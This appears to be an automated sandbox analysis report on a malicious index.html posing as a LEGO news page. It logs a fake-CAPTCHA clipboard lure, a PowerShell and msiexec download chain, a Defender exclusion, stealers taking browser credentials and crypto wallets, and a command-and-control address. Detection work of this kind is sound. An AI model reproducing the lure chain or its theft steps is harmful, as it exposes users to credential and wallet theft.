Windows Analysis Report
index.html

General Information

Sample name:	index.html
Analysis ID:	1714997
Has dependencies:	false
MD5:	9de4e281612e97e3974c5bd5db1469b3
SHA1:	add38144a6b04906f0adf164d56c6e0c25ea52f6
SHA256:	a47760ac64c9da44400b429fd8aff3ba425606b5921c6100a80e950743e04812
Infos:	yarasigma

Detection

Aurotun Stealer, CAPTCHA Scam ClickFix, Meduza Stealer, MicroClip

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Sigma detected: msiexec download and execute

Suricata IDS alerts for network traffic

Yara detected AntiDebug via timestamp check

Yara detected Aurotun Stealer

Yara detected CAPTCHA Scam ClickFix

Yara detected Meduza Stealer

Yara detected MicroClip

Adds a directory exclusion to Windows Defender

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

HTML page adds supicious text to clipboard

HTML page contains obfuscated javascript

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Tries to detect sandboxes / dynamic malware analysis system (Installed program check)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Checks for available system drives (often done to infect USB drives)

Connects to many different domains

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected suspicious crossdomain redirect

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTML page contains hidden javascript code

HTML title does not match URL

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: MsiExec Web Install

Sigma detected: Msiexec Initiated Connection

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses cacls to modify the permissions of files

Classification

Signatures

Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2069393414.0000026BFFB39000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_3b78ef6b-2

Phishing

AI detected phishing page

Source: https://security.cleodgiflaoer.com/?domain=

Joe Sandbox AI: Score: 9 Reasons: The brand 'Hulu' is a well-known streaming service with a legitimate domain of 'hulu.com'., The provided URL 'security.cleodgiflaoer.com' does not match the legitimate domain of Hulu., The domain 'cleodgiflaoer.com' is unrelated to Hulu and appears suspicious., The use of 'security' as a subdomain is a common tactic in phishing to create a false sense of legitimacy., The domain name 'cleodgiflaoer.com' contains random characters and does not resemble any known brand or service. DOM: 1.1.pages.csv

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 1.17.o.script.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

HTML page contains obfuscated javascript

Source: https://security.cleodgiflaoer.com/?domain=

HTTP Parser: (function(_0x572606,_0x460a99){function _0xf2bdba(_0x38aae4,_0x2d99c1,_0x969114,_0x5488b9,_0x128364

HTML page contains hidden javascript code

Source: https://security.cleodgiflaoer.com/?domain=

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....

HTML title does not match URL

Source: index.html

HTTP Parser: Title: Brickfinder - BREAKING: LEGO Plans to Go Public in 2026, Marking a Major Shift for the Iconic Toymaker does not match URL

Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=dc49d12f-268e-44cf-beaf-5f620ebc1363&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=aa8ef359-7711-4f73-9a10-a4f834077e70&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=794d6ba5-57f4-4b4c-8b88-7957e361c566&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=149cdbc0-866f-42e6-8df2-1187b573235f&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://3797690.fls.doubleclick.net/activityi;src=3797690;type=show;cat=all;ord=4161336106969;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=2;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499429;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=3797690;type=show;cat=all;ord=4161336106969;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=9;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499429;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://3797690.fls.doubleclick.net/activityi;src=3797690;type=hhp;cat=hulu_0;ord=9810726650724;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=2;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499462;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=3797690;type=hhp;cat=hulu_0;ord=9810726650724;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=9;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499462;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=2c95c6e7-724a-4d17-9cc4-59e903cb7485&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=dc49d12f-268e-44cf-beaf-5f620ebc1363&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=aa8ef359-7711-4f73-9a10-a4f834077e70&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=794d6ba5-57f4-4b4c-8b88-7957e361c566&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=149cdbc0-866f-42e6-8df2-1187b573235f&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://3797690.fls.doubleclick.net/activityi;src=3797690;type=show;cat=all;ord=4161336106969;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=2;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499429;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=3797690;type=show;cat=all;ord=4161336106969;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=9;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499429;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://3797690.fls.doubleclick.net/activityi;src=3797690;type=hhp;cat=hulu_0;ord=9810726650724;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=2;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499462;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=3797690;type=hhp;cat=hulu_0;ord=9810726650724;npa=0;auiddc=1415331820.1750025499;u1=welcome;uaa=x86;uab=64;uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;_tu=IFA;gtm=45fe56b1v9135077591za200;gcd=13l3l3l3l1l1;dma=0;dc_fmt=9;tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104617979~104617981~104661466~104661468~104684208~104684211~104718208~104736445~104736447;epver=2;dc_random=1750025499462;_dc_test=1;~oref=https%3A%2F%2Fwww.hulu.com%2Fwelcome?
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://tr.snapchat.com/cm/i?pid=2c95c6e7-724a-4d17-9cc4-59e903cb7485&u_scsid=68308930-5c7c-4215-9436-adb3730cd527&u_sclid=14fa9928-9755-4c13-9e1d-2bfce2f75df0
Source: https://www.hulu.com/welcome	HTTP Parser: Iframe src: https://insight.adsrvr.org/track/cei?adv=gq4m5xv&ref=https%3A%2F%2Fwww.hulu.com%2Fwelcome&upid=gm9irf0&upv=1.1.0&paapi=1

Source: https://security.cleodgiflaoer.com/?domain=	HTTP Parser: No favicon
Source: https://security.cleodgiflaoer.com/?domain=	HTTP Parser: No favicon
Source: https://security.cleodgiflaoer.com/?domain=	HTTP Parser: No favicon
Source: https://www.hulu.com/welcome	HTTP Parser: No favicon
Source: https://www.hulu.com/welcome	HTTP Parser: No favicon
Source: https://www.hulu.com/welcome	HTTP Parser: No favicon

Source: https://www.hulu.com/welcome	HTTP Parser: No <meta name="author".. found
Source: https://www.hulu.com/welcome	HTTP Parser: No <meta name="author".. found

Source: index.html	HTTP Parser: No <meta name="copyright".. found
Source: https://www.hulu.com/welcome	HTTP Parser: No <meta name="copyright".. found
Source: https://www.hulu.com/welcome	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.197:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49904 version: TLS 1.2

Source:

Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSIDE18.tmp.23.dr

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: Network traffic	Suricata IDS: 2061200 - Severity 1 - ET MALWARE MonsterV2 Stealer CnC Checkin : 192.168.2.4:49873 -> 144.172.117.158:7712
Source: Network traffic	Suricata IDS: 2061200 - Severity 1 - ET MALWARE MonsterV2 Stealer CnC Checkin : 192.168.2.4:49898 -> 144.172.117.158:7712

Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 142.251.32.104:139
Source: global traffic	TCP traffic: 192.168.2.4:49753 -> 104.18.11.207:139
Source: global traffic	TCP traffic: 192.168.2.4:49761 -> 142.250.65.206:139
Source: global traffic	TCP traffic: 192.168.2.4:49807 -> 3.168.102.97:139
Source: global traffic	TCP traffic: 192.168.2.4:49873 -> 144.172.117.158:7712

Source: Joe Sandbox View	IP Address: 54.160.143.175 54.160.143.175
Source: Joe Sandbox View	IP Address: 57.144.180.128 57.144.180.128
Source: Joe Sandbox View	IP Address: 35.71.131.137 35.71.131.137

Source: Joe Sandbox View	JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.4:51625 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.4:52582 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.4:63777 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.4:58757 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.4:49757 -> 172.67.186.167:443
Source: Network traffic	Suricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.4:49764 -> 104.21.68.46:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197

Source: index.html	String found in binary or memory: <a href="https://www.facebook.com/Brickfinder/" target="_blank" style="text-decoration:none;"><img src="../images/facebook500.png" width="40" height="40" alt="Facebook @Brickfinder"/></a> equals www.facebook.com (Facebook)
Source: index.html	String found in binary or memory: <a href="https://www.youtube.com/channel/UCcfMLDmNble_Vos_AFRVS4g" target="_blank" style="text-decoration:none;"><img src="../images/youtube.png" width="40" height="40" alt="Youtube @Brickfinder"/></a> equals www.youtube.com (Youtube)
Source: chromecache_481.4.dr	String found in binary or memory: return a;};u.map={"fb_ss_email":"ud[em]","cp._persisted_HEM":"ud[em]","fb_eid_pageview":"eid","fbclid":"fbc"};u.extend=[];u.send=function(a,b){if(u.ev[a]\|\|u.ev.all!==undefined){var c,d,e,f;u.data={"qsp_delim":"&","kvp_delim":"=","qs_delim":"?","tag_type":"img","base_url":"//www.facebook.com/tr","secure_base_url":"","static_params":"id=931485653552938&ev=PageView&dpo=LDU&dpoco=0&dpost=0&noscript=1","cachebust":"disabled","cachevar":""\|\|"_rnd"};utag.DB("send:490:EXTENSIONS");utag.DB(b);c=[];for(d in utag.loader.GV(u.map)){if(typeof b[d]!=="undefined"&&b[d]!==""){e=u.map[d].split(",");for(f=0;f<e.length;f++){if(!u.data.hasOwnProperty(e[f])){c.push(e[f]+"##kvp_delim##"+u.encode(b[d]));} equals www.facebook.com (Facebook)
